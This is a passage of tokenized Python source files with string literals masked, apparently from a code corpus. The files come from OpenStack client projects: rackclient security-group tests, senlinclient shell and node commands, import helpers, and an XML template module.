PropertyMock ( side_effect = statuses ) <EOL> self . assertRaises ( exceptions . ResourceTimeout , <EOL> resource2 . wait_for_status , <EOL> "<STR_LIT>" , resource , status , None , <NUM_LIT:1> , <NUM_LIT:3> ) <EOL> def test_no_sleep ( self ) : <EOL> resource = mock . Mock ( ) <EOL> statuses = [ "<STR_LIT>" ] <EOL> type ( resource ) . status = mock . PropertyMock ( side_effect = statuses ) <EOL> self . assertRaises ( exceptions . ResourceTimeout , <EOL> resource2 . wait_for_status , <EOL> "<STR_LIT>" , resource , "<STR_LIT:status>" , None , <NUM_LIT:0> , - <NUM_LIT:1> ) <EOL> class TestWaitForDelete ( base . TestCase ) : <EOL> @ mock . patch ( "<STR_LIT>" , return_value = None ) <EOL> def test_success ( self , mock_sleep ) : <EOL> resource = mock . Mock ( ) <EOL> resource . get . side_effect = [ None , None , exceptions . NotFoundException ] <EOL> result = resource2 . wait_for_delete ( "<STR_LIT>" , resource , <NUM_LIT:1> , <NUM_LIT:3> ) <EOL> self . assertEqual ( result , resource ) <EOL> @ mock . patch ( "<STR_LIT>" , return_value = None ) <EOL> def test_timeout ( self , mock_sleep ) : <EOL> resource = mock . Mock ( ) <EOL> resource . get . side_effect = [ None , None , None ] <EOL> self . assertRaises ( exceptions . ResourceTimeout , <EOL> resource2 . wait_for_delete , <EOL> "<STR_LIT>" , resource , <NUM_LIT:1> , <NUM_LIT:3> ) </s>
<s> from rackclient import exceptions as exc <EOL> from rackclient . tests import utils <EOL> from rackclient . tests . v1 import fakes <EOL> from rackclient . v1 import securitygroups <EOL> class SecuritygroupsTest ( utils . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( SecuritygroupsTest , self ) . setUp ( ) <EOL> self . cs = fakes . FakeClient ( ) <EOL> self . securitygroup_type = securitygroups . Securitygroup <EOL> self . gid = '<STR_LIT>' <EOL> self . user_id = '<STR_LIT>' <EOL> self . project_id = '<STR_LIT>' <EOL> def test_list ( self ) : <EOL> securitygroups = self . cs . securitygroups . list ( self . gid ) <EOL> self . cs . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' % self . gid ) <EOL> for securitygroup in securitygroups : <EOL> self . assertIsInstance ( securitygroup , self . securitygroup_type ) <EOL> def test_get ( self ) : <EOL> securitygroup_id = '<STR_LIT>' <EOL> securitygroup = self . cs . securitygroups . get ( self . gid , securitygroup_id ) <EOL> self . cs . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' % ( self . gid , securitygroup_id ) ) <EOL> self . assertEqual ( self . gid , securitygroup . gid ) <EOL> self . assertEqual ( self . user_id , securitygroup . user_id ) <EOL> self . assertEqual ( self . project_id , securitygroup . project_id ) <EOL> self . assertEqual ( securitygroup_id , securitygroup . securitygroup_id ) <EOL> self . assertEqual ( '<STR_LIT>' , securitygroup . neutron_securitygroup_id ) <EOL> self . assertEqual ( '<STR_LIT>' , securitygroup . name ) <EOL> self . assertEqual ( True , securitygroup . is_default ) <EOL> self . assertEqual ( '<STR_LIT>' , securitygroup . 
status ) <EOL> def _create_body ( self , name , is_default , rules ) : <EOL> return { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : is_default , <EOL> '<STR_LIT>' : rules <EOL> } <EOL> } <EOL> def test_create ( self ) : <EOL> name = '<STR_LIT>' <EOL> is_default = True <EOL> rules = [ { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ] <EOL> securitygroup = self . cs . securitygroups . create ( self . gid , name , is_default , rules ) <EOL> body = self . _create_body ( name , is_default , rules ) <EOL> self . cs . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' % self . gid , body ) <EOL> self . assertIsInstance ( securitygroup , self . securitygroup_type ) <EOL> def test_create_invalid_parameters ( self ) : <EOL> name = '<STR_LIT>' <EOL> rules = [ { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ] <EOL> self . assertRaises ( exc . CommandError , self . cs . securitygroups . create , <EOL> self . gid , name , '<STR_LIT>' , rules ) <EOL> rules = { } <EOL> self . assertRaises ( exc . CommandError , self . cs . securitygroups . create , <EOL> self . gid , name , True , rules ) <EOL> def _update_body ( self , is_default ) : <EOL> return { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : is_default <EOL> } <EOL> } <EOL> def test_update ( self ) : <EOL> is_default = True <EOL> securitygroup_id = '<STR_LIT>' <EOL> securitygroup = self . cs . securitygroups . update ( self . gid , securitygroup_id , is_default ) <EOL> body = self . _update_body ( is_default ) <EOL> self . cs . assert_called ( '<STR_LIT>' , '<STR_LIT>' % ( self . gid , securitygroup_id ) , body ) <EOL> self . assertIsInstance ( securitygroup , self . securitygroup_type ) <EOL> def test_update_invalid_parameters ( self ) : <EOL> is_default = '<STR_LIT>' <EOL> securitygroup_id = '<STR_LIT>' <EOL> self . 
assertRaises ( exc . CommandError , self . cs . securitygroups . update , <EOL> self . gid , securitygroup_id , is_default ) <EOL> def test_delete ( self ) : <EOL> securitygroup_id = '<STR_LIT>' <EOL> self . cs . securitygroups . delete ( self . gid , securitygroup_id ) <EOL> self . cs . assert_called ( '<STR_LIT>' , '<STR_LIT>' % ( self . gid , securitygroup_id ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import argparse <EOL> import logging <EOL> import sys <EOL> from oslo_utils import encodeutils <EOL> from oslo_utils import importutils <EOL> import six <EOL> import senlinclient <EOL> from senlinclient import cliargs <EOL> from senlinclient import client as senlin_client <EOL> from senlinclient . common import exc <EOL> from senlinclient . common . i18n import _ <EOL> from senlinclient . common import utils <EOL> osprofiler_profiler = importutils . try_import ( "<STR_LIT>" ) <EOL> USER_AGENT = '<STR_LIT>' <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class HelpFormatter ( argparse . HelpFormatter ) : <EOL> def start_section ( self , heading ) : <EOL> heading = '<STR_LIT>' % ( heading [ <NUM_LIT:0> ] . upper ( ) , heading [ <NUM_LIT:1> : ] ) <EOL> super ( HelpFormatter , self ) . start_section ( heading ) <EOL> class SenlinShell ( object ) : <EOL> def _setup_logging ( self , debug ) : <EOL> log_lvl = logging . DEBUG if debug else logging . WARNING <EOL> logging . basicConfig ( format = "<STR_LIT>" , <EOL> level = log_lvl ) <EOL> logging . getLogger ( '<STR_LIT>' ) . setLevel ( logging . WARNING ) <EOL> logging . getLogger ( '<STR_LIT>' ) . setLevel ( logging . WARNING ) <EOL> def _setup_verbose ( self , verbose ) : <EOL> if verbose : <EOL> exc . verbose = <NUM_LIT:1> <EOL> def _find_actions ( self , subparsers , actions_module ) : <EOL> for attr in ( a for a in dir ( actions_module ) if a . startswith ( '<STR_LIT>' ) ) : <EOL> command = attr [ <NUM_LIT:3> : ] . replace ( '<STR_LIT:_>' , '<STR_LIT:->' ) <EOL> callback = getattr ( actions_module , attr ) <EOL> desc = callback . __doc__ or '<STR_LIT>' <EOL> help = desc . strip ( ) . split ( '<STR_LIT:\n>' ) [ <NUM_LIT:0> ] <EOL> arguments = getattr ( callback , '<STR_LIT>' , [ ] ) <EOL> subparser = subparsers . 
# NOTE(review): tail of a subcommand-registration helper whose opening lines
# are above this chunk; code left untouched, comments only.
add_parser(command,
           help=help,
           description=desc,
           add_help=False,
           formatter_class=HelpFormatter)
# Hidden per-subcommand help option; SUPPRESS keeps it out of help output.
subparser.add_argument('<STR_LIT>', '<STR_LIT>',
                       action='<STR_LIT>',
                       help=argparse.SUPPRESS)
# Register every option declared on the callback (via decorator metadata).
for (args, kwargs) in arguments:
    subparser.add_argument(*args, **kwargs)
subparser.set_defaults(func=callback)
self.subcommands[command] = subparser

def do_bash_completion(self, args):
    """Print the space-joined set of command names and option strings.

    Intended to be consumed by a bash completion script.
    """
    commands = set()
    options = set()
    for sc_str, sc in self.subcommands.items():
        # Skip bookkeeping entries that should not be completed.
        if sc_str == '<STR_LIT>' or sc_str == '<STR_LIT>':
            continue
        commands.add(sc_str)
        # Collect every option string registered on the subparser.
        for option in list(sc._optionals._option_string_actions):
            options.add(option)
    print('<STR_LIT:U+0020>'.join(commands | options))

def add_profiler_args(self, parser):
    """Add the osprofiler option, but only when osprofiler is importable."""
    if osprofiler_profiler:
        parser.add_argument(
            '<STR_LIT>', metavar='<STR_LIT>',
            help=_('<STR_LIT>'
                   '<STR_LIT>'
                   '<STR_LIT>'
                   '<STR_LIT>'
                   '<STR_LIT>'
                   '<STR_LIT>'
                   '<STR_LIT>'))

def _add_bash_completion_subparser(self, subparsers):
    """Register the hidden bash-completion subcommand."""
    subparser = subparsers.add_parser('<STR_LIT>',
                                      add_help=False,
                                      formatter_class=HelpFormatter)
    subparser.set_defaults(func=self.do_bash_completion)
    self.subcommands['<STR_LIT>'] = subparser

def get_subcommand_parser(self, base_parser, version):
    """Attach all versioned subcommands to *base_parser* and return it.

    Actions are discovered both in the versioned shell module and on this
    shell object itself.
    """
    parser = base_parser
    self.subcommands = {}
    subparsers = parser.add_subparsers(metavar='<STR_LIT>')
    submodule = utils.import_versioned_module(version, '<STR_LIT>')
    self._find_actions(subparsers, submodule)
    self._find_actions(subparsers, self)
    self._add_bash_completion_subparser(subparsers)
    return parser

@utils.arg('<STR_LIT>', metavar='<STR_LIT>', nargs='<STR_LIT:?>',
           help=_('<STR_LIT>'))
def do_help(self, args):
    """Print help for the whole program or for a single subcommand."""
    if getattr(args, '<STR_LIT>', None):
        if args.command in self.subcommands:
            self.subcommands[args.command].print_help()
        else:
            raise exc.CommandError("<STR_LIT>" %
                                   args.command)
    else:
        self.parser.print_help()

def _check_identity_arguments(self, args):
    """Validate the authentication/identity related CLI arguments.

    Hard requirements raise CommandError; merely suspicious combinations
    only print a warning message.
    """
    # An auth URL is always mandatory.
    if not args.auth_url:
        msg = _('<STR_LIT>'
                '<STR_LIT>')
        raise exc.CommandError(msg)
    # Some form of user identification (name, id or token) is required.
    if not (args.username or args.user_id or args.token):
        msg = _('<STR_LIT>'
                '<STR_LIT>')
        raise exc.CommandError(msg)
    # Supplying both a user name and a user id is redundant: warn only.
    if (args.username and args.user_id):
        msg = _('<STR_LIT>'
                '<STR_LIT>')
        print(_('<STR_LIT>') % msg)
    # NOTE(review): presumably a keystone v3 URL check — confirm.
    if '<STR_LIT>' in args.auth_url:
        if (args.username and not args.user_id):
            # A bare user name needs a domain to be unambiguous.
            if not (args.user_domain_id or args.user_domain_name):
                msg = _('<STR_LIT>'
                        '<STR_LIT>'
                        '<STR_LIT>'
                        '<STR_LIT>'
                        '<STR_LIT>')
                raise exc.CommandError(msg)
    # A user identified by name/id must also supply a password.
    if (args.username or args.user_id) and not (args.password):
        msg = _('<STR_LIT>') % (
            args.username or args.user_id)
        raise exc.CommandError(msg)
    # Project/tenant scoping checks.
    if (not (args.project_id or args.project_name or args.tenant_id
             or args.tenant_name)):
        if not (args.user_id):
            msg = _('<STR_LIT>'
                    '<STR_LIT>'
                    '<STR_LIT>')
            raise exc.CommandError(msg)
        else:
            msg = _('<STR_LIT>'
                    '<STR_LIT>'
                    '<STR_LIT>')
            print(_('<STR_LIT>') % msg)
    # Both a project/tenant id and a name were given: id wins, warn only.
    if ((args.project_id or args.tenant_id) and
            (args.project_name or args.tenant_name)):
        msg = _('<STR_LIT>'
                '<STR_LIT>'
                '<STR_LIT>')
        print(_('<STR_LIT>') % msg)
    if '<STR_LIT>' in args.auth_url:
        # A project identified only by name needs a project domain.
        if (not (args.project_id or args.tenant_id) and
                (args.project_name or args.tenant_name) and
                not (args.project_domain_id or args.project_domain_name)):
            msg = _('<STR_LIT>'
                    '<STR_LIT>'
                    '<STR_LIT>'
                    '<STR_LIT>'
                    '<STR_LIT>')
            raise exc.CommandError(msg)

def _setup_senlin_client(self, api_ver, args):
    """Build the senlin client from the parsed identity arguments."""
    kwargs = {
        '<STR_LIT>': args.auth_plugin or '<STR_LIT:password>',
        '<STR_LIT>': args.auth_url,
        # project_* takes precedence; tenant_* is the legacy spelling.
        '<STR_LIT>': args.project_name or args.tenant_name,
        '<STR_LIT>': args.project_id or args.tenant_id,
        '<STR_LIT>': args.domain_name,
        '<STR_LIT>': args.domain_id,
        '<STR_LIT>': args.project_domain_name,
        '<STR_LIT>': args.project_domain_id,
        '<STR_LIT>': args.user_domain_name,
        '<STR_LIT>': args.user_domain_id,
        '<STR_LIT:username>': args.username,
        '<STR_LIT>': args.user_id,
        '<STR_LIT:password>': args.password,
        '<STR_LIT>': args.verify,
        '<STR_LIT>': args.token,
        '<STR_LIT>': args.trust_id,
    }
    return senlin_client.Client('<STR_LIT:1>', args.user_preferences, USER_AGENT,
                                **kwargs)

def main(self, argv):
    """Entry point: parse *argv*, dispatch to the selected subcommand."""
    parser = argparse.ArgumentParser(
        prog='<STR_LIT>',
        description=__doc__.strip(),
        epilog=_('<STR_LIT>'
                 '<STR_LIT>'),
        add_help=False,
        formatter_class=HelpFormatter,
    )
    cliargs.add_global_args(parser, version=senlinclient.__version__)
    cliargs.add_global_identity_args(parser)
    self.add_profiler_args(parser)
    base_parser = parser
    # First pass: only the global options, to learn the API version.
    (options, args) = base_parser.parse_known_args(argv)
    self._setup_logging(options.debug)
    self._setup_verbose(options.verbose)
    api_ver = options.senlin_api_version
    LOG.info(api_ver)
    # Second pass: full parser including versioned subcommands.
    subcommand_parser = self.get_subcommand_parser(base_parser, api_ver)
    self.parser = subcommand_parser
    # NOTE(review): relies on Python precedence `(not args and options.help)
    # or not argv` — confirm that grouping is intended.
    if not args and options.help or not argv:
        self.do_help(options)
        return <NUM_LIT:0>
    args = subcommand_parser.parse_args(argv)
    # help/bash-completion need no authentication; short-circuit them.
    if args.func == self.do_help:
        self.do_help(args)
        return <NUM_LIT:0>
    elif args.func == self.do_bash_completion:
        self.do_bash_completion(args)
        return <NUM_LIT:0>
    self._check_identity_arguments(args)
    sc = self._setup_senlin_client(api_ver, args)
    profile = osprofiler_profiler and options.profile
    if profile:
        osprofiler_profiler.init(options.profile)
    args.func(sc.service, args)
    if profile:
        trace_id = osprofiler_profiler.get().get_base_id()
        print(_("<STR_LIT>") % trace_id)
        print(_("<STR_LIT>"
                "<STR_LIT>") % trace_id)

def main(args=None):
    """Module-level entry point wrapping SenlinShell.main with error handling."""
    try:
        if args is None:
            args = sys.argv[<NUM_LIT:1>:]
        SenlinShell().main(args)
    except KeyboardInterrupt:
        print(_("<STR_LIT>"), file=sys.stderr)
        sys.exit(<NUM_LIT>)
    except Exception as e:
        # Re-raise with traceback when a debug-style flag is present.
        if '<STR_LIT>' in args or '<STR_LIT>' in args:
            raise
        else:
            # NOTE(review): safe_encode returns bytes — on Python 3 this
            # prints the bytes repr; confirm whether safe_decode was meant.
            print(encodeutils.safe_encode(six.text_type(e)), file=sys.stderr)
            sys.exit(<NUM_LIT:1>)

if __name__ == "<STR_LIT:__main__>":
    main()
"""OpenStackClient command plugins for senlin node operations."""

import logging
import six
import sys

from cliff import command
from cliff import lister
from cliff import show
from openstack import exceptions as sdk_exc
from openstackclient.common import exceptions as exc
from openstackclient.common import utils
from senlinclient.common.i18n import _
from senlinclient.common.i18n import _LI
from senlinclient.common import utils as senlin_utils


class ListNode(lister.Lister):
    """List nodes known to the clustering service."""

    log = logging.getLogger(__name__ + "<STR_LIT>")

    def get_parser(self, prog_name):
        """Build the parser: cluster filter, key=value filters, sorting,
        pagination (limit/marker) and the global-project / full-id toggles.
        """
        parser = super(ListNode, self).get_parser(prog_name)
        parser.add_argument(
            '<STR_LIT>',
            metavar='<STR_LIT>',
            help=_('<STR_LIT>')
        )
        # Repeatable key=value filter option.
        parser.add_argument(
            '<STR_LIT>',
            metavar='<STR_LIT>',
            help=_("<STR_LIT>"
                   "<STR_LIT>"
                   "<STR_LIT>"
                   "<STR_LIT>"),
            action='<STR_LIT>'
        )
        parser.add_argument(
            '<STR_LIT>',
            metavar='<STR_LIT>',
            help=_("<STR_LIT>"
                   "<STR_LIT>"
                   "<STR_LIT>"
                   "<STR_LIT>"
                   "<STR_LIT>")
        )
        parser.add_argument(
            '<STR_LIT>',
            metavar='<STR_LIT>',
            help=_('<STR_LIT>')
        )
        parser.add_argument(
            '<STR_LIT>',
            metavar='<STR_LIT>',
            help=_('<STR_LIT>')
        )
        parser.add_argument(
            '<STR_LIT>',
            default=False, action="<STR_LIT:store_true>",
            help=_('<STR_LIT>'
                   '<STR_LIT>'
                   '<STR_LIT>')
        )
        parser.add_argument(
            '<STR_LIT>',
            default=False, action="<STR_LIT:store_true>",
            help=_('<STR_LIT>')
        )
        return parser

    def take_action(self, parsed_args):
        """Query nodes matching the filters and return rows for display."""
        self.log.debug("<STR_LIT>", parsed_args)
        senlin_client = self.app.client_manager.clustering
        columns = ['<STR_LIT:id>', '<STR_LIT:name>', '<STR_LIT:index>', '<STR_LIT:status>', '<STR_LIT>',
                   '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>']
        queries = {
            '<STR_LIT>': parsed_args.cluster,
            '<STR_LIT>': parsed_args.sort,
            '<STR_LIT>': parsed_args.limit,
            '<STR_LIT>': parsed_args.marker,
            '<STR_LIT>': parsed_args.global_project,
        }
        if parsed_args.filters:
            queries.update(senlin_utils.format_parameters(parsed_args.filters))
        nodes = senlin_client.nodes(**queries)
        if not parsed_args.full_id:
            # Abbreviate ID-like columns to 8 characters unless full IDs
            # were requested; empty values render as the fallback string.
            formatters = {
                '<STR_LIT:id>': lambda x: x[:<NUM_LIT:8>],
                '<STR_LIT>': lambda x: x[:<NUM_LIT:8>] if x else '<STR_LIT>',
                '<STR_LIT>': lambda x: x[:<NUM_LIT:8>] if x else '<STR_LIT>'
            }
        else:
            formatters = {}
        return (
            columns,
            (utils.get_item_properties(n, columns, formatters=formatters)
             for n in nodes)
        )


class ShowNode(show.ShowOne):
    """Show details of a single node."""

    log = logging.getLogger(__name__ + "<STR_LIT>")

    def get_parser(self, prog_name):
        parser = super(ShowNode, self).get_parser(prog_name)
        parser.add_argument(
            '<STR_LIT>',
            default=False,
            action="<STR_LIT:store_true>",
            help=_('<STR_LIT>')
        )
        parser.add_argument(
            '<STR_LIT>',
            metavar='<STR_LIT>',
            help=_('<STR_LIT>')
        )
        return parser

    def take_action(self, parsed_args):
        self.log.debug("<STR_LIT>", parsed_args)
        senlin_client = self.app.client_manager.clustering
        return _show_node(senlin_client, parsed_args.node, parsed_args.details)


def _show_node(senlin_client, node_id, show_details=False):
    """Fetch one node and format it as (columns, values) for display.

    Raises CommandError when the node does not exist.
    """
    args = {'<STR_LIT>': True} if show_details else None
    try:
        node = senlin_client.get_node(node_id, args=args)
    except sdk_exc.ResourceNotFound:
        raise exc.CommandError(_('<STR_LIT>') % node_id)
    formatters = {
        '<STR_LIT>': senlin_utils.json_formatter,
        '<STR_LIT:data>': senlin_utils.json_formatter,
    }
    if show_details and node:
        # Pretty-print the nested details mapping as key/value rows.
        formatters['<STR_LIT>'] = senlin_utils.nested_dict_formatter(
            list(node['<STR_LIT>'].keys()), ['<STR_LIT>', '<STR_LIT:value>'])
    columns = sorted(list(six.iterkeys(node)))
    return columns, utils.get_dict_properties(node.to_dict(), columns,
                                              formatters=formatters)


class CreateNode(show.ShowOne):
    """Create a node and show the resulting resource."""

    log = logging.getLogger(__name__ + "<STR_LIT>")

    def get_parser(self, prog_name):
        parser = super(CreateNode, self).get_parser(prog_name)
        # Profile is the only mandatory option besides the node name.
        parser.add_argument(
            '<STR_LIT>',
            metavar='<STR_LIT>',
            required=True,
            help=_('<STR_LIT>')
        )
        parser.add_argument(
            '<STR_LIT>',
            metavar='<STR_LIT>',
            help=_('<STR_LIT>')
        )
        parser.add_argument(
            '<STR_LIT>',
            metavar='<STR_LIT>',
            help=_('<STR_LIT>')
        )
        parser.add_argument(
            '<STR_LIT>',
            metavar='<STR_LIT>',
            help=_('<STR_LIT>'
                   '<STR_LIT>'
                   '<STR_LIT>'),
            action='<STR_LIT>'
        )
        parser.add_argument(
            '<STR_LIT:name>',
            metavar='<STR_LIT>',
            help=_('<STR_LIT>')
        )
        return parser

    def take_action(self, parsed_args):
        self.log.debug("<STR_LIT>", parsed_args)
        senlin_client = self.app.client_manager.clustering
        attrs = {
            '<STR_LIT:name>': parsed_args.name,
            '<STR_LIT>': parsed_args.cluster,
            '<STR_LIT>': parsed_args.profile,
            '<STR_LIT>': parsed_args.role,
            '<STR_LIT>': senlin_utils.format_parameters(parsed_args.metadata),
        }
        node = senlin_client.create_node(**attrs)
        # Re-fetch and display the freshly created node.
        return _show_node(senlin_client, node.id)


class UpdateNode(show.ShowOne):
    """Update attributes of an existing node and show the result."""

    log = logging.getLogger(__name__ + "<STR_LIT>")

    def get_parser(self, prog_name):
        parser = super(UpdateNode, self).get_parser(prog_name)
        parser.add_argument(
            '<STR_LIT>',
            metavar='<STR_LIT>',
            help=_('<STR_LIT>')
        )
        parser.add_argument(
            '<STR_LIT>',
            metavar='<STR_LIT>',
            help=_('<STR_LIT>')
        )
        parser.add_argument(
            '<STR_LIT>',
            metavar='<STR_LIT>',
            help=_('<STR_LIT>')
        )
        parser.add_argument(
            '<STR_LIT>',
            metavar='<STR_LIT>',
            help=_('<STR_LIT>'
                   '<STR_LIT>'
                   '<STR_LIT>'),
            action='<STR_LIT>'
        )
        parser.add_argument(
            '<STR_LIT>',
            metavar='<STR_LIT>',
            help=_('<STR_LIT>')
        )
        return parser

    def take_action(self, parsed_args):
        self.log.debug("<STR_LIT>", parsed_args)
        senlin_client = self.app.client_manager.clustering
        # Resolve the node first so a bad identifier fails early.
        node = senlin_client.find_node(parsed_args.node)
        if node is None:
            raise exc.CommandError(_('<STR_LIT>') % parsed_args.node)
        attrs = {
            '<STR_LIT:name>': parsed_args.name,
            '<STR_LIT>': parsed_args.role,
            '<STR_LIT>': parsed_args.profile,
            '<STR_LIT>': senlin_utils.format_parameters(parsed_args.metadata),
        }
        senlin_client.update_node(node.id, **attrs)
        return _show_node(senlin_client, node.id)


class DeleteNode(command.Command):
    """Delete one or more nodes, with interactive confirmation."""

    log = logging.getLogger(__name__ + "<STR_LIT>")

    def get_parser(self, prog_name):
        parser = super(DeleteNode, self).get_parser(prog_name)
        parser.add_argument(
            '<STR_LIT>',
            metavar='<STR_LIT>',
            nargs='<STR_LIT:+>',
            help=_('<STR_LIT>')
        )
        parser.add_argument(
            '<STR_LIT>',
            action='<STR_LIT:store_true>',
            help=_('<STR_LIT>')
        )
        return parser

    def take_action(self, parsed_args):
        self.log.debug("<STR_LIT>", parsed_args)
        senlin_client = self.app.client_manager.clustering
        try:
            # Prompt only in interactive sessions and when not forced;
            # anything that doesn't start with 'y' aborts.
            if not parsed_args.force and sys.stdin.isatty():
                sys.stdout.write(
                    _("<STR_LIT>"
                      "<STR_LIT>"))
                prompt_response = sys.stdin.readline().lower()
                if not prompt_response.startswith('<STR_LIT:y>'):
                    return
        except KeyboardInterrupt:
            self.log.info(_LI('<STR_LIT>'))
            return
        except EOFError:
            self.log.info(_LI('<STR_LIT>'))
            return
        # Best-effort deletion: keep going after individual failures and
        # report the aggregate count at the end.
        failure_count = <NUM_LIT:0>
        for nid in parsed_args.node:
            try:
                senlin_client.delete_node(nid, False)
            except Exception as ex:
                failure_count += <NUM_LIT:1>
                print(ex)
        if failure_count:
            raise exc.CommandError(_('<STR_LIT>'
                                     '<STR_LIT>') %
                                   {'<STR_LIT:count>': failure_count,
                                    '<STR_LIT>': len(parsed_args.node)})
        print('<STR_LIT>')


class CheckNode(command.Command):
    """Trigger a health check action on one or more nodes."""

    log = logging.getLogger(__name__ + "<STR_LIT>")

    def get_parser(self, prog_name):
        parser = super(CheckNode, self).get_parser(prog_name)
        parser.add_argument(
            '<STR_LIT>',
            metavar='<STR_LIT>',
            nargs='<STR_LIT:+>',
            help=_('<STR_LIT>')
        )
        return parser

    def take_action(self, parsed_args):
        self.log.debug("<STR_LIT>", parsed_args)
        senlin_client = self.app.client_manager.clustering
        for nid in parsed_args.node:
            try:
                resp = senlin_client.check_node(nid)
            except sdk_exc.ResourceNotFound:
                raise exc.CommandError(_('<STR_LIT>') % nid)
            # Each check is asynchronous; report the action id returned.
            print('<STR_LIT>'
                  '<STR_LIT>'
                  % {'<STR_LIT>': nid, '<STR_LIT:action>': resp['<STR_LIT:action>']})


class RecoverNode(command.Command):
    """Trigger a recover action on one or more nodes."""

    log = logging.getLogger(__name__ + "<STR_LIT>")

    def get_parser(self, prog_name):
        parser = super(RecoverNode, self).get_parser(prog_name)
        parser.add_argument(
            '<STR_LIT>',
            metavar='<STR_LIT>',
            nargs='<STR_LIT:+>',
            help=_('<STR_LIT>')
        )
        return parser

    def take_action(self, parsed_args):
        self.log.debug("<STR_LIT>", parsed_args)
        senlin_client = self.app.client_manager.clustering
        for nid in parsed_args.node:
            try:
                resp = senlin_client.recover_node(nid)
            except sdk_exc.ResourceNotFound:
                raise exc.CommandError(_('<STR_LIT>') % nid)
            # Recovery is asynchronous; report the action id returned.
            print('<STR_LIT>'
                  '<STR_LIT>'
                  % {'<STR_LIT>': nid, '<STR_LIT:action>': resp['<STR_LIT:action>']})
"""Helpers for importing modules, classes and objects by dotted name."""

import sys
import traceback


def import_class(import_str):
    """Return the attribute (usually a class) named by a dotted string."""
    module_part, _sep, attr_part = import_str.rpartition('<STR_LIT:.>')
    __import__(module_part)
    try:
        return getattr(sys.modules[module_part], attr_part)
    except AttributeError:
        raise ImportError('<STR_LIT>' %
                          (attr_part,
                           traceback.format_exception(*sys.exc_info())))


def import_object(import_str, *args, **kwargs):
    """Import the class named by *import_str* and instantiate it."""
    cls = import_class(import_str)
    return cls(*args, **kwargs)


def import_object_ns(name_space, import_str, *args, **kwargs):
    """Instantiate *import_str*, first trying it relative to *name_space*.

    Falls back to the bare import string when the namespaced variant
    cannot be imported.
    """
    import_value = "<STR_LIT>" % (name_space, import_str)
    try:
        cls = import_class(import_value)
    except ImportError:
        cls = import_class(import_str)
    return cls(*args, **kwargs)


def import_module(import_str):
    """Import and return the module named by *import_str*."""
    __import__(import_str)
    return sys.modules[import_str]


def import_versioned_module(version, submodule=None):
    """Import a version-specific module, optionally a submodule of it."""
    name = '<STR_LIT>' % version
    if submodule:
        name = '<STR_LIT:.>'.join((name, submodule))
    return import_module(name)


def try_import(import_str, default=None):
    """Import a module, returning *default* when the import fails."""
    try:
        return import_module(import_str)
    except ImportError:
        return default
from solumclient.openstack.common.apiclient import base


class Platform(base.Resource):
    """A platform API resource."""

    def __repr__(self):
        # _info is the raw resource data held by base.Resource.
        return "<STR_LIT>" % self._info


class PlatformManager(base.BaseManager):
    """Manager for Platform resources."""

    resource_class = Platform

    def get(self, **kwargs):
        """Fetch the platform resource from its fixed endpoint.

        NOTE(review): **kwargs is accepted but not forwarded — confirm
        whether that is intentional.
        """
        return self._get('<STR_LIT>')
import pkg_resources

# Prefer the installed distribution's metadata; when the package is not
# installed (e.g. running from a source checkout), fall back to pbr's
# version detection.
try:
    version_string = pkg_resources.get_provider(
        pkg_resources.Requirement.parse('<STR_LIT>')).version
except pkg_resources.DistributionNotFound:
    import pbr.version
    version_string = str(pbr.version.VersionInfo('<STR_LIT>'))
import os.path

from lxml import etree
import six
from xml.dom import minidom
from xml.parsers import expat
from xml import sax
from xml.sax import expatreader

from rack import exception
from rack.openstack.common.gettextutils import _
from rack import utils

XMLNS_V10 = '<STR_LIT>'
XMLNS_V11 = '<STR_LIT>'
XMLNS_COMMON_V10 = '<STR_LIT>'
XMLNS_ATOM = '<STR_LIT>'


def validate_schema(xml, schema_name, version='<STR_LIT>'):
    """Validate *xml* (tree or string) against the named RelaxNG schema.

    Raises lxml's DocumentInvalid when validation fails.
    """
    if isinstance(xml, str):
        xml = etree.fromstring(xml)
    base_path = '<STR_LIT>'
    # Only the common schemas live outside the versioned directory.
    if schema_name not in ('<STR_LIT>', '<STR_LIT>'):
        base_path += '<STR_LIT>' % version
    schema_path = os.path.join(utils.rackdir(),
                               '<STR_LIT>' % (base_path, schema_name))
    schema_doc = etree.parse(schema_path)
    relaxng = etree.RelaxNG(schema_doc)
    relaxng.assertValid(xml)


class Selector(object):
    """Selects a datum from an object via a chain of keys/callables."""

    def __init__(self, *chain):
        """Store the lookup chain."""
        self.chain = chain

    def __repr__(self):
        """Return a readable representation of the chain."""
        return "<STR_LIT>" + repr(self.chain)

    def __call__(self, obj, do_raise=False):
        """Apply each chain element: call callables, index with the rest.

        Returns None on a failed lookup unless *do_raise* is set, in which
        case KeyError is raised.
        """
        for elem in self.chain:
            if callable(elem):
                obj = elem(obj)
            else:
                if obj == '<STR_LIT>':
                    return '<STR_LIT>'
                try:
                    obj = obj[elem]
                except (KeyError, IndexError):
                    if do_raise:
                        raise KeyError(elem)
                    return None
        return obj


def get_items(obj):
    """Return the items of a dict-like object as a list of pairs."""
    return list(obj.items())


def get_items_without_dict(obj):
    """Return the items of *obj*, excluding entries whose value is a dict.

    BUGFIX: the previous implementation removed entries from the list while
    iterating over it, which skips the element after each removal (two
    consecutive dict-valued entries left the second one in the result).
    Building a new filtered list avoids the skip.
    """
    return [item for item in obj.items()
            if not isinstance(item[1], dict)]


class EmptyStringSelector(Selector):
    """Selector that returns the empty string instead of None on a miss."""

    def __call__(self, obj, do_raise=False):
        """Apply the chain, mapping a failed lookup to the empty string."""
        try:
            return super(EmptyStringSelector, self).__call__(obj, True)
        except KeyError:
            return "<STR_LIT>"


class ConstantSelector(object):
    """Selector that always returns a fixed value, ignoring the object."""

    def __init__(self, value):
        """Store the constant value."""
        self.value = value

    def __repr__(self):
